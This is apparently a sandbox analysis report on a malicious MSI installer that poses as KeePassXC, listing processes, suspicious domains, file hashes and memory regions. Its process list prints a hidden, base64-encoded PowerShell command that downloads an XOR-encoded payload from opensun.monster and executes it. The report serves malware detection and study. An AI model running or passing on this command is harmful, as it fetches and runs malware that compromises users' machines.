| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 51A3AC4FF8095876459BB49781BDF4DF
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3BD2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3492 -ip 3492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 964
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"
C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
"C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"
\??\c:\st\Autoit3.exe
"c:\st\Autoit3.exe" c:\st\script.a3x
\??\c:\windows\SysWOW64\cmd.exe
"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\bakfgfa\ffcfhbc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get domain
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | not-pass.com | udp |
| US | 172.67.219.67:80 | not-pass.com | tcp |
| US | 172.67.219.67:443 | not-pass.com | tcp |
| US | 8.8.8.8:53 | 67.219.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gachi-lane.com | udp |
| US | 172.67.172.142:80 | gachi-lane.com | tcp |
| US | 8.8.8.8:53 | 142.172.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 172.67.195.205:80 | raur94.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 172.67.195.205:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | opensun.monster | udp |
| US | 172.67.160.176:443 | opensun.monster | tcp |
| US | 8.8.8.8:53 | 205.195.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkass.monster | udp |
| US | 172.67.129.199:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 199.129.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| NL | 194.55.186.13:80 | 194.55.186.13 | tcp |
| US | 8.8.8.8:53 | 13.186.55.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dintrinnssports.shop | udp |
| US | 104.21.2.232:80 | dintrinnssports.shop | tcp |
| US | 8.8.8.8:53 | 232.2.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
Files
C:\Windows\Installer\MSI3856.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSI3A2F.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
memory/4584-28-0x0000000004AF0000-0x0000000004B26000-memory.dmp
memory/4584-29-0x0000000005220000-0x0000000005848000-memory.dmp
memory/4584-30-0x0000000005940000-0x0000000005962000-memory.dmp
memory/4584-32-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/4584-31-0x00000000059E0000-0x0000000005A46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adehlmyp.ihz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4584-42-0x0000000005CE0000-0x0000000006034000-memory.dmp
memory/4584-43-0x00000000060C0000-0x00000000060DE000-memory.dmp
memory/4584-44-0x0000000006100000-0x000000000614C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/4584-46-0x0000000007830000-0x0000000007EAA000-memory.dmp
memory/4584-47-0x0000000006600000-0x000000000661A000-memory.dmp
memory/4584-48-0x00000000070D0000-0x0000000007166000-memory.dmp
memory/4584-49-0x00000000066B0000-0x00000000066D2000-memory.dmp
memory/4584-50-0x0000000008460000-0x0000000008A04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1
| MD5 | c5e6cb1760799fcd20cd069562b9c480 |
| SHA1 | f7c5201de15fc2a655dd5fca39616a0c461ad6b3 |
| SHA256 | c1e94bf5215a5a3508e24f3a0ca7f2a621a993ec22bf53bfc7cfc54bbfd32301 |
| SHA512 | c6b12f914a037c509cb8533af7112be775613ec28c80ddea2e869fd2792cf89d470c22f3599c9f936625f1bc7fc291932d2caa9fe433ba355ced3fdc2d7866c6 |
memory/4584-52-0x0000000008080000-0x0000000008242000-memory.dmp
memory/4584-53-0x0000000008F40000-0x000000000946C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt
| MD5 | d3cfb7d0c8d2e3fe6a0eb110baf7e755 |
| SHA1 | 369e9d8630eda9fd3d0f9bf4daa815e33207ffd4 |
| SHA256 | 5b0e557ac6fb728e4946ec8d27d97cab02d6e44dfc3a526d52643d758dbbff12 |
| SHA512 | 2b1f4b3feba76460da5bbe70cf8c2744837859e8e9df2923984f99500a6a07cf996ea441aa245708d7a6f8616148360c7dc4eae989b9584e9869f8d3bbc12ebf |
C:\Config.Msi\e5737cc.rbs
| MD5 | 15dd794e48ae730d475190ed93c4a59e |
| SHA1 | e1205720b936582f3a05edf0eb8eb661e1a45f91 |
| SHA256 | 9d999f6a03afe2d396655d91db50beca54ee38e351b249ee367c4f48743bb6a9 |
| SHA512 | a11b45c264d78b964f367319668a227869722d04cb46af2551e4c346137473bf6c1af795a7fd12fe9cc063d11dcb91f802b919604a75c0910f517033667c4bec |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
| MD5 | fc16fce41560bed85c97d9551fdfc3c1 |
| SHA1 | 26a867e66cd4730383046de480aa1785d4b93bf2 |
| SHA256 | e35a84063e76646544486d2b172c7f0ffd52d28f9f258379370979b73bdc0857 |
| SHA512 | 0954901366b8d2e4bf9ff0450c072bac6cc89113f304dfae2ff87e9d3d4380780122e1ce81ce1d908a364ff1970da9e85e3a41b54b13b83d1c147611a39fde91 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll
| MD5 | a542f74ee60dfbee3e8e919acb22e773 |
| SHA1 | 8e3a47d726f3c7daf4b6168effbca676bcc0be2c |
| SHA256 | f99611c9b7000dc50f4aeac26c590072bfecffdd1cba9903b6bed649eb14550c |
| SHA512 | acfc819f23f49a296a9437a6f7aa2ce8066285312af5c72ca41973e7daa090e9ab6f30eeecb722756c2a5b3a70f959977f06c524cc11bf7c0bc99f1b3e58a7a1 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll
| MD5 | 3dc9596998ebac48a1ea9d5557649eeb |
| SHA1 | 16115408bab17885ad9bf95810dbd7a35f159e4a |
| SHA256 | 3880e50ab6e204b9fbc2952ff39411a530612ddcbd82c296d916065f37b755e6 |
| SHA512 | 7a6641b3f8bcfbe165aeb8f7477f931188e58a72bae63dfe2ba1c86736cdc6c7f6c86c0d433badb64f3c799202a2f5439eab0f04362b5b882f7f5c346f9765f9 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll
| MD5 | e1cd8a087c9b045fb6e770f27ef03707 |
| SHA1 | 6d5aff3ccbfd81f0760a0d8d22799dce4973acb6 |
| SHA256 | eaa197134ecc9c8995ececdea42aaaa5b09a2039a608452ae3223d976da8efa5 |
| SHA512 | 3ef02820c5fa2ffaf461d16f000894ec696da38431a158205fc74947b47c93d0de793c54c0b801acd2f7ebe9cfef3970cf8960c47597e94e62adcbb09196101a |
memory/3492-183-0x0000000071810000-0x0000000071A0A000-memory.dmp
memory/1988-189-0x0000000000770000-0x0000000000798000-memory.dmp
memory/3492-191-0x00000000001F0000-0x00000000007BF000-memory.dmp
memory/3492-190-0x0000000062D80000-0x0000000062DBB000-memory.dmp
memory/3492-188-0x0000000072BC0000-0x000000007331D000-memory.dmp
memory/1988-187-0x0000000000770000-0x0000000000798000-memory.dmp
memory/3492-186-0x0000000003150000-0x0000000003175000-memory.dmp
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll
| MD5 | 411642ebdf422cac211237a449ffb139 |
| SHA1 | cfb06e94ccdc6704d8ea3f5659481c317a0371af |
| SHA256 | 23272d4c3f19a13fa236369d2a296202a3c7067fa1698572dea9c23b9eae00b7 |
| SHA512 | 4a144c877ec977ba6db0166ba3a559b9201bdc66c0bcf11b4772565c713a5f6f207168490b3a8231e6d23dd6041ce01df66e3af7d6b4899a743e6c3bfe598670 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpng16-16.dll
| MD5 | ac58db75da7b5ce9cfbe4987e7386319 |
| SHA1 | 94c03ce52a34a189c75ba40f51df448e4b986cb4 |
| SHA256 | 5d83d4535c4687f9d40bbe43f4f5d9e897f4d5996f211643273cf712b768706f |
| SHA512 | 0e3a5d8f9de9490fd0626c0aeaac44d3cb25a23dd5dd69fa985bc55617a86f881fad02a4d3531b10924a9446458552e7268b2dbafb819df60d3d0476e68d7af4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll
| MD5 | bb8004dd00979ea17a243df6d40f2b05 |
| SHA1 | 482b4ea7b92e3aee7b13278ee79ce84ee7e09d7a |
| SHA256 | 7df7355b2968a68491356e377da1fc772776b43033eb13df0738df90fdf54d32 |
| SHA512 | 060e0e12b7a54ea023e2790c8f35d930427c33ca566f88a253f322d1022e6e399ace6c550b42252df07e1c609e6dabc73ad62b8f712e8c5a3fa3380274079d52 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll
| MD5 | 484a47b28f7e935039289146d8592c73 |
| SHA1 | 328681021f9ef4ef52a12e8bc944edaf9eed5689 |
| SHA256 | fd02a3c891349da4d956a13e189b57f23e1d1a22209dad3875ff72e2e85cd541 |
| SHA512 | 83b5dbac473dd390c739a38b8cebedfae7c9949f583ddbb69326b9bd39aab8c28d40e6951acf47c10ea2ac51620e2de96912ab7aced713985b263769277129b5 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libharfbuzz-0.dll
| MD5 | 4503f9be16890c735d37533f6b739c98 |
| SHA1 | 3800d347d3e2c2099cedfcacacd2c53415f6310f |
| SHA256 | 020c3d69ec42f836daa1b7740c397badb921e9db6cc8b874a4a13bc5a9564ece |
| SHA512 | 7d3ac686380a52c3444138afa8394869e0cb780aa5af7fbd23c6703653f43a1bafd1a379884c830035a70a875b1e73ab609477e39e27698458b747f81bd463ff |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll
| MD5 | fd240f08139a7bbefc3aeec099210579 |
| SHA1 | f2738c0a2b3ef6a51d7b89d731854a0924f71bfb |
| SHA256 | e8e72f078844e6fc97fa9ed417eefef7fc30192b3f6f0074d6d6d80a176d3100 |
| SHA512 | 14177b251e771c88148c9a2ff433f64c1a9c977320c42c882381e698fff7592148b6d7485c537bc720ac3685bb3cbef6cea63e50fe038c8f6a5b61e9460d16f4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll
| MD5 | c72948b84d9dd02eb85f1774739eafa8 |
| SHA1 | 1f255f8b808ee310dba95beb896a3ec360f16ebc |
| SHA256 | 2b1df97fb3cf4a54d68bf7ca2611f0cc0663908309fd58a48989804dc4fec284 |
| SHA512 | fda087b6e86cf02dcf4324e391be2f8ef54dce9cb787dbc343d90efd9d9f54189fe0994fee628c0465c1c9f51c6d1783955c8002215517fc5358ae1e7518067b |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll
| MD5 | f73bb12c46d209ab7317f3ef878d4abe |
| SHA1 | bd8acd83f4eb5afbb6ea2c90fe40062c58fd1ef4 |
| SHA256 | edb71eb6815bde6ec47b1167c74d26f7d9fd08bb6d4cfc3c08683eaeda39dcde |
| SHA512 | 88d8381f639350bab0d360a32370eee325ae2d0c366c898ce23ffc62f85ad921776aa856219671d39620c25d7856c82f19b2e7cdde6ac641092b2df8a0ab70ef |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll
| MD5 | 8b2a6e8419a8a4e7d3fd023d97455fb9 |
| SHA1 | 2547a1f94fb4f83b7c133a3e285ee11faa155e84 |
| SHA256 | 7087cdd1acdff6cd1b8d821388f430af3888314b05a5821bb53e67034362f670 |
| SHA512 | 44438f6dd4becabc2cb3053e2c42877cbdb0f309fe272f67a94ad530caf1c5e5d49bc394f7d21c4226a4f0eb6d8661c5c7113508ea2f446e0dbea0d59554d4a4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll
| MD5 | cdf811c8e5fc6b313c91b19d2362dc2c |
| SHA1 | 26cc74948b8082c3a2e2f348bdff903954974ec0 |
| SHA256 | da173ce470873cc18134dba881f8018656ca0ad03fb0cb5a3ea8552b8785f9de |
| SHA512 | 322da5b6063a03f599f3fdf3e0f86eb541912b9dd7ae4dc9e4ff10b8133c8e3797ebd9f31872f403c257d6456edd7eca2d28915396d3aefaf549816a4b59ae8a |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll
| MD5 | 661ed9d4bd3bd416d31def947cd4f502 |
| SHA1 | d18fd6c6c9081648818a6654e5a74f8fcd21c1a3 |
| SHA256 | d72768f29c12fe808038feb80c8415bf8d47fe5e22a074214cf2c56bf90b7a09 |
| SHA512 | 984e2b937ee469b86abc1a9b52407e746f976d01de2cf949e68dc079e498c1f7d5ec74b2ada7d5e0211f9d21b0e6ba4ce0ec66d1da73bcd11f1373022834f0bb |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll
| MD5 | 270ca6cfb0bbb0cad78ce9b8d7ccc4f3 |
| SHA1 | eeed9ebcf68cc96e4c0e0a8c46010a7e634e207a |
| SHA256 | e3659dab4b91636c27f3a41eda8d4afe59101021468eef539191d16a7b92da9e |
| SHA512 | 6c4102686fc83bdca4a495b1f68b5fe48a1be0e8c73bc8d97d0664a2ab1a6fde68f5e380dbfcb55698cc58fd42a9f04c47876a22167aa04be6b492ee0b7d91b6 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll
| MD5 | 83761f6a5bebfa2383a456325688c851 |
| SHA1 | 0eb04f6a54b76135816be039b8a14ef297cb48cc |
| SHA256 | 824f08f9f69b5a28baeef5ef9d9335f9ad87600a830e304b1c696e2f97a92727 |
| SHA512 | 9851ff17d653c0ac8c75c8694d630773474e62d03f64fbce93258b64b999dba23e80d3f8e3cf0287b2a492574a4fdeb6bd8a86070946e9ef6dfb912c31ed4cee |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll
| MD5 | 883d51ff2fa63084fef0b252c62b259c |
| SHA1 | 375993ca6c25195302cff56da2a7f70ed116b681 |
| SHA256 | 699225b460328cc4d6f026a57b89472db56aef46a242066c83f4c404ab9f386d |
| SHA512 | dbed13d06af7cb25c3cbe6f02be3663125a6a340e0f82e565f32d66448296af6188f98c1082d5110be567788c04f47ef402bc730ca4d5eb0fc29e3bc527a31f8 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll
| MD5 | b015508d22a275d220481547617f74bf |
| SHA1 | b65eb8773297d988ce034795e95d1455dd1f09e2 |
| SHA256 | cf928b42713f1ae39fd6a3f084ba3aaa4d28cef7cfcd57ddd3e2883214fa6e91 |
| SHA512 | 02adea4881ca255cef289b357eefcc0c989fb0ad9e2a211b508bdbaea9d4becdd030615bd68ecd7696b0b5fd8c6efc6580c4f05147f455b6b6155d3fd01397b0 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll
| MD5 | b6b0178576ee844019d0f2fa214df8c8 |
| SHA1 | 6bb884f83beac17f42597160d321d4ad2bd3c6c2 |
| SHA256 | 455e4487b294c9648f2f4852ab68ba5d45e880bd1e8cf3d27e58150c2aedb20c |
| SHA512 | e214e6232d4f2469769af243b01cde10e72ef1acdad1e92fe1e9cf7b74fd127831bc223a3ad983695f35e4eadfaff49110948d63e085c551094f534e33e04ab4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll
| MD5 | 76e68d56326f70acb1c20bc3ad9ea20d |
| SHA1 | f1f74224abed3f01f643b2a103c41158e586d827 |
| SHA256 | d84b30cf544bbf0657df31e196196877fa874b011a275afdd4bd39729070891f |
| SHA512 | fd786822ea98ceffcad9266c306afb0ad08a82d389925eb6a8b077c7b153afeb91a622b6e31f26bbb8fcfd14183e4e8c1ab495154322e977cb74e5d33529d681 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll
| MD5 | a1737041533ac620a8385c7b99046d18 |
| SHA1 | 2154912e5ec6e84af91eb883f6fe41dfccef3b03 |
| SHA256 | 8e214eec4218407c339f35cc4b133b82e264855a15c407f3f93fc12be93ac0db |
| SHA512 | 1508fe92ba0a0f14e93676f1d53923d0b91df4208d23897cd9003b0436bf826fb98ebd3514a8e6e9c15bf9d993fcb538dcfb0b8461f33bce835da736229804c2 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll
| MD5 | 24dac6152c216a1b7b1afef7c36e2b65 |
| SHA1 | a832467931f07b3f41772d89feb194a90be4119b |
| SHA256 | 784af4a0d287a6611d5ee4fda32e31d7b3d5afcd14bca75d2564bb9f0045b449 |
| SHA512 | b4da7fe3e32fe1dc89197ec4f0a84c1cb38ff4d872f842f4692d1520e2b39efd2d7e3b928a8e225d2504aadf72a923ed7ee7e3552988c6365b9b30358912d6ce |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll
| MD5 | a33a65fc77e446a7dffb163e07610a8f |
| SHA1 | a574215a88f53ef4f53d9b3c4b1905d6c2644202 |
| SHA256 | 430d8036d0b568efe975fb7406156056e9ad16cd814d9b5de157704e85754a1a |
| SHA512 | fe3b6af1d343e82b185fbb2fc5272f6f38baecd0a4e0d32c340f8ac0ee6d8b39661033ac64ecc58770fc7a2db328706b8c84abda756e42a88b6e972a9427d3ce |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll
| MD5 | 31037212185611990b67b6831fbddb39 |
| SHA1 | 7f20b8975654604b54e9809a5668ba266de3733e |
| SHA256 | af646bb5c7d4844de540f187dddcaa9b573fd0a34646a7d16f961ed32c691f21 |
| SHA512 | a1573605550baeeb18f75d49e27d785169e389c2eae3b10f76471feed2485680ed785c66d28eeeea7cfdd0a8c6e539b7b872a4c7c93cd29713f8a500ab03c1e6 |
C:\Windows\Installer\e5737c9.msi
| MD5 | 531a806e5efce1d6ee6085e67f518029 |
| SHA1 | 45e6d6242fe8ef3986b0f2b66c72226f285bdd06 |
| SHA256 | 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c |
| SHA512 | 2df8901814180b2de3ffab09042c4be7f95ffb98d471f075477dead3500a046dd14e15946b3b9d72b7b8997fa745e1f866b1b518dea4b67a6ce548c0f895a4a1 |
memory/1988-192-0x0000000000770000-0x0000000000798000-memory.dmp
memory/4028-199-0x0000018D25230000-0x0000018D25252000-memory.dmp
memory/3492-208-0x0000000074C80000-0x0000000074D7A000-memory.dmp
memory/3492-207-0x00000000738D0000-0x0000000073AAB000-memory.dmp
memory/3492-206-0x0000000074D80000-0x0000000074D93000-memory.dmp
memory/3492-211-0x0000000072BC0000-0x000000007331D000-memory.dmp
memory/3492-217-0x0000000072230000-0x00000000722B0000-memory.dmp
memory/3492-215-0x0000000062D80000-0x0000000062DBB000-memory.dmp
memory/3492-224-0x0000000071810000-0x0000000071A0A000-memory.dmp
memory/3492-231-0x0000000071290000-0x0000000071357000-memory.dmp
memory/3492-230-0x0000000071410000-0x0000000071460000-memory.dmp
memory/3492-229-0x00000000713C0000-0x000000007140E000-memory.dmp
memory/3492-228-0x0000000071640000-0x0000000071685000-memory.dmp
memory/3492-227-0x0000000071540000-0x0000000071635000-memory.dmp
memory/3492-226-0x00000000716F0000-0x0000000071802000-memory.dmp
memory/3492-225-0x0000000071690000-0x00000000716EC000-memory.dmp
memory/3492-218-0x0000000072320000-0x000000007298F000-memory.dmp
memory/3492-223-0x0000000071A10000-0x0000000071D58000-memory.dmp
memory/3492-222-0x0000000061840000-0x000000006185A000-memory.dmp
memory/3492-221-0x00000000721A0000-0x00000000721DA000-memory.dmp
memory/3492-220-0x00000000721E0000-0x00000000721F8000-memory.dmp
memory/3492-219-0x0000000072200000-0x0000000072226000-memory.dmp
memory/3492-216-0x00000000722B0000-0x0000000072317000-memory.dmp
memory/3492-214-0x0000000072990000-0x0000000072B51000-memory.dmp
memory/3492-213-0x0000000072B60000-0x0000000072BBD000-memory.dmp
memory/3492-212-0x0000000073320000-0x00000000738AA000-memory.dmp
memory/3492-210-0x00000000738B0000-0x00000000738C1000-memory.dmp
memory/3492-209-0x0000000074C60000-0x0000000074C7C000-memory.dmp
memory/3492-205-0x0000000074DA0000-0x0000000074DC6000-memory.dmp
memory/3492-204-0x00000000001F0000-0x00000000007BF000-memory.dmp
